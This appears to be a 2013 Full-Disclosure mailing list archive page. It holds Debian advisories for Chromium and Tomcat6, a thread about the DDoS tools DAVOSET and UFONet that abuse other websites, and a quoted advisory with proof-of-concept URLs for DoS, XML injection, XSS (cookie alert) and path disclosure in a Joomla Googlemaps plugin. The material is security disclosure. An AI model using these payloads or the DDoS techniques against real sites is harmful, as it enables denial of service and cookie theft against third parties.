[Full-disclosure] [SECURITY] [DSA 2724-1] chromium-browser security update

2013-07-18 Thread Michael Gilbert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2724-1   secur...@debian.org
http://www.debian.org/security/   Michael Gilbert
July 17, 2013  http://www.debian.org/security/faq
- -

Package: chromium-browser
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-2853 CVE-2013-2867 CVE-2013-2868 CVE-2013-2869
 CVE-2013-2870 CVE-2013-2871 CVE-2013-2873 CVE-2013-2875
 CVE-2013-2876 CVE-2013-2877 CVE-2013-2878 CVE-2013-2879
 CVE-2013-2880

Several vulnerabilities have been discovered in the Chromium web browser.

CVE-2013-2853

The HTTPS implementation does not ensure that headers are terminated
by \r\n\r\n (carriage return, newline, carriage return, newline).

CVE-2013-2867

Chrome does not properly prevent pop-under windows.

CVE-2013-2868

common/extensions/sync_helper.cc proceeds with sync operations for
NPAPI extensions without checking for a certain plugin permission
setting.

CVE-2013-2869

Denial of service (out-of-bounds read) via a crafted JPEG2000
image.

CVE-2013-2870

Use-after-free vulnerability in network sockets.

CVE-2013-2871

Use-after-free vulnerability in input handling.

CVE-2013-2873

Use-after-free vulnerability in resource loading.

CVE-2013-2875

Out-of-bounds read in SVG file handling.

CVE-2013-2876

Chrome does not properly enforce restrictions on the capture of
screenshots by extensions, which could lead to information
disclosure from previous page visits.

CVE-2013-2877

Out-of-bounds read in XML file handling.

CVE-2013-2878

Out-of-bounds read in text handling.

CVE-2013-2879

The circumstances in which a renderer process can be considered a
trusted process for sign-in and subsequent sync operations were
not propertly checked.

CVE-2013-2880

The chrome 28 development team found various issues from internal
fuzzing, audits, and other studies.

For the stable distribution (wheezy), these problems have been fixed in
version 28.0.1500.71-1~deb7u1.

For the testing distribution (jessie), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 28.0.1500.71-1.

We recommend that you upgrade your chromium-browser packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iQQcBAEBCgAGBQJR5z1ZAAoJELjWss0C1vRzXNcgALd1S9ITVHdzvjtnyZ9j2o8c
WThFzzbsuq5NQdmvd05rgVE9DM4gZqw+iDDraeDPkNwG6u5v3DsjwQubRBCcsRT8
cPMVuV2hromqAmd5ghqbWQ4w4/I73JDJbrnGszJPL/SCKx7/6XYFl6HOgr3rNUxz
FCODDsahUPo/BJ39QImC2nLqaI0B+81CTMzna0oMRDXrAsHHo74U8o8Uf5W6W5ux
Lnxdw/mB+Ebh+2X73K4+xCHzzC5UEH7YR2VH2Ljex4D9SWdKUEk16Wb7qDXUuZ5D
Y30WQ7NRmZWfzrAHi510+I4gVyBY6F1n5wlb81jUcm6fk/Mgo17fe1DSaXn2TQf5
ikFvRaXVS+fT/RIhteyTJsGmIudFOmTt38vzH5sjMc3NV8o5EORA8GtE4q22ewiI
wyFYN4wFQgp684XHntcALnEOXGVM2Q9W+bfdqvKWQFYustzNjoHIlj0bEV1e+Ifg
2jhvE1hu5xj/UoIfUniqd1XwIx/bPMdk6Z8Ltb0D1cyHJ48H6VdAI2JQY7a3Xusq
1Aqk9DyIFdp+iR5FT+Ume03ucpwbnSx5qJxdGqb7tbmeNShY9xgyWZhRimrVt44c
hA+wqHXIBeK5Rq4+0RCfWTlTje61ZlGFzmxUVIBweFWXzHHMBDSIzMv944O6tQQx
oNHl2GinPZKs3H7ETIagV64qnB/829spKbktnBRJ4PMyOHMzVLs8r/ohL1VJMbKr
0rdnv/YHS+dMiFHI9L8S+oY/F7kkUVh+t3UvEXvMNhb9Y4xuT3jRzh89yT9btMTb
NABbqp0ADY5gVMqM8W5zfYklyD/kf+iyU233JArS6j3YZxJsZGfsUycmq118vygJ
WItOsInHTEsa53oCwMM9wrk96lFO44HqZ2ssyWK+Oi9CN8vihr10dirnk8hhXQrs
nwQiqxRUhPdVSrCYUM19k78lfPcR3fXzydiC9gPp3jD/7XxG7PWEfz4I8zVG1IFt
j/3BeWE6nJoK+G95ZrNeUdBSBdIM2JUjcFdsUJCAy+HWdOhJnRu6/CZsRjvND/H3
AATuIMBkfjj0sHeYN6MeUaaeVo3+QH3tJ+EbSiY2X8LIb97dTCa/lV0CZnA6ZpQw
IAPcfCajfPSQ0RmmwNm4bm+a+oRwalDnbjkOEWDIJmo74jpefgyDqYUVKKO8HVF0
uBsB7kvJwg6MyR6QMRj+6Ema0j5cbuXx8AVQtU2pGEqFTHTYL0DkYdojevegFqwM
giaO8ILAcR6C0BI8IrWSMde49piy4n8GHnAUhkVU5waJTiU5vTAv9yORkfFQEpfb
ZRIebEJdbxXbiyVdTVI/zmEf36kxLGUNge8sPreeQv8lGTkMxWNrPEeaDFSWk1s=
=gQNK
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DDoS attacks via other sites execution tool

2013-07-18 Thread MustLive 

Hello psy!

I'm glad that you liked DOVOSET. And I'm glad that you liked my articles,
including those old articles about attacks via redirectors (Redirectors'
hell and Hellfire for redirectors).

Such attacks can be used together with XSS holes. So it can be useful for
your tool. Specially for using with your UFONet - to use XSS holes with
looped redirectors to conduct more powerful DDoS attacks - I released
advisory about Denial of Service vulnerabilities WordPress at 27.06.2013.
Any redirector at any web site or any redirector service can be used with
XSS vulnerabilities to conduct DDoS attack via UFONet.


Curiously, I posted a tool written in python the same day. It is called:
UFONet


I made my tool already in 2010. That time I made an announcement of the
tool, where I described DAVOSET and its effectiveness, but didn't release
the tool. I made it private and gave it only to one security researcher, who
wanted to look at it. I didn't want to give such kind of attacking tool to
script kiddies (to prevent mass attacks, because there were a lot such Abuse
of Functionality vulnerabilities in Internet, since 2007 when I start
finding them and presented in zombies-lists with my tool). But because for
three years people continue to ignore such holes and almost nobody fixed
such holes (just few most serious ones, and even Yahoo lamerly ignored for a
long time such hole in their Babelfish and in 2012 just lamerly closed it),
so I decided to release it publicly in June 2013.


My idea now, is to work the detection of new 'zombies' by crawlering
techniques and increase the "strike" capability requests.


Good ideas. But concerning automated searching XSS holes by crawlering.
It'll be already XSS scanner, not just attacking tool for using existent
vulnerabilities, and it'll give a lot of power to an attacker. No need for
him to find XSS holes, your tool will do everything for him ;-). Just enter
target site and UFONet will do all the work (find a lot of zombies and
attack the target with all of them), so be careful with such functionality.


I have seen that your tool doesn't allows the use of proxies. It may be
interesting to add that functionality.


Thanks for suggestion. I've added it to ToDo - in addition to all my ideas
(which I have a lot). The reason, why I've not done it earlier and was
not planning, is simple - DAVOSET is using other sites as proxies for
conducting DoS attacks. So target sites after received DDoS attacks from
multiple zombie sites will be seeing in logs only Google, W3C and other
sites/IPs. So proxying is part of attack :-). But for paranoids, who worry
that admins on zombie-sites will give their logs to admins of victim-sites
(or not admins, but special services), then additional proxy will be good
solution (and I'll add proxy support in the future).


+ Video: http://vimeo.com/68772290


I've seen your video. And I wrote you feedback about video and some feedback
about UFONet last month. And will write more feedback soon.

Keep working on your software. Concerning your release of v.0.2. Think about 
making more detailed changelog (not just mention concerning release of new 
version, but with detailed description of changes).


Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message - 
From: "psy" 

To: "MustLive" 
Cc: ; 
Sent: Wednesday, June 19, 2013 10:25 PM
Subject: Re: [Full-disclosure] DDoS attacks via other sites execution tool



Hi,

On 18/06/13 22:50, MustLive wrote:

Hello participants of Mailing List.

If you haven't read my article (written in 2010 and last week I wrote
about
it to WASC list) Advantages of attacks on sites with using other sites
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008846.html),

feel free to do it. In this article I reminded you about using of the
sites
for attacks on other sites
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html),
DDoS attacks via other sites execution tool (DAVOSET)
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006832.html),

sending spam via sites and creating spam-botnets
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html)

and wrote about advantages of attacks on sites with using other sites.


I have read the articles and they are very interesting, for example, the
"hell" redirection. This kind of web abuse can be very powerful.

Nice work! ;-)


Last week I've published online my DDoS attacks via other sites execution
tool (http://websecurity.com.ua/davoset/). It's tool for conducting
of DDoS attacks via Abuse of Functionality vulnerabilities on the sites,
which I've made in 2010. Description and changelog on English are
presented
at my site. Where you can get my DAVOSET v.1.0.5 (made at 18.07.2010).


Curiously, I posted a tool written in python the same day. It is called:
UFONet

http://ufonet.sf.net

At first, I designed a

[Full-disclosure] [SECURITY] [DSA 2725-1] tomcat6 security update

2013-07-18 Thread Moritz Muehlenhoff 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2725-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
July 18, 2013  http://www.debian.org/security/faq
- -

Package: tomcat6
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-3544 CVE-2013-2067

Two security issues have been found in the Tomcat servlet and JSP engine:

CVE-2012-3544

The input filter for chunked transfer encodings could trigger high 
resource consumption through malformed CRLF sequences, resulting in 
denial of service.

CVE-2013-2067

The FormAuthenticator module was vulnerable to session fixation.

For the oldstable distribution (squeeze), these problems have been fixed in
version 6.0.35-1+squeeze3. This update also provides fixes for 
CVE-2012-2733,CVE-2012-3546,CVE-2012-4431, CVE-2012-4534,CVE-2012-5885,
CVE-2012-5886 and CVE-2012-5887, which were all fixed for stable already.

For the stable distribution (wheezy), these problems have been fixed in
version 6.0.35-6+deb7u1.

For the unstable distribution (sid), these problems will be fixed soon.

We recommend that you upgrade your tomcat6 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org





-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlHoLKoACgkQXm3vHE4uylp56QCff9NXUl0J3tcY6bjyROYrMWh5
kekAoJb3+ErnUADVo4tpir+woaK+7lma
=bdVm
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Multiple vulnerabilities in Googlemaps plugin for Joomla

2013-07-18 Thread Źmicier Januszkiewicz 
Ah, and as a side effect, you get a bunch of free HTTP proxies -- the
script will fetch and print anything. Just to fix up the content type, but
this should not be an issue.

Finally, something useful.

I leave the google dork as an exercise for the reader.

Cheers,
Z.


2013/7/16 MustLive 

> Hello list!
>
> These are Denial of Service, XML Injection, Cross-Site Scripting and Full
> path disclosure vulnerabilities in Googlemaps plugin for Joomla.
>
> -
> Affected products:
> -
>
> Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and
> potentially previous versions. In new version of DAVOSET I'll add a lot of
> web sites with Googlemaps plugin.
>
> -
> Affected vendors:
> -
>
> Mike Reumer
> http://extensions.joomla.org/**extensions/maps-a-weather/**
> maps-a-locations/maps/1147
>
> --
> Details:
> --
>
> Denial of Service (WASC-10):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php?**
> url=site2/large_file
>
> Besides conducting DoS attack manually, it's also possible to conduct
> automated DoS and DDoS attacks with using of DAVOSET (
> http://lists.webappsec.org/**pipermail/websecurity_lists.**
> webappsec.org/2013-June/**008850.html
> ).
>
> XML Injection (WASC-23):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php?**
> url=site2/xml.xml
>
> It's possible to include external xml-files. Which also can be used for
> XSS attack:
>
> XSS via XML Injection (WASC-23):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php?**
> url=site2/xss.xml
>
> File xss.xml:
>
> 
> 
>  XSS
>  
>  http://www.w3.org/1999/**xhtml 
> ">alert(document.**cookie)
>  
> 
>
> Cross-Site Scripting (WASC-08):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php?**
> url=%3Cbody%20onload=alert(**document.cookie)%3E
>
> Full path disclosure (WASC-13):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php
>
> Besides plugin_googlemap2_proxy.php, also happens
> plugin_googlemap3_proxy.php (but it has other path at web sites).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> __**_
> Full-Disclosure - We believe in it.
> Charter: 
> http://lists.grok.org.uk/full-**disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/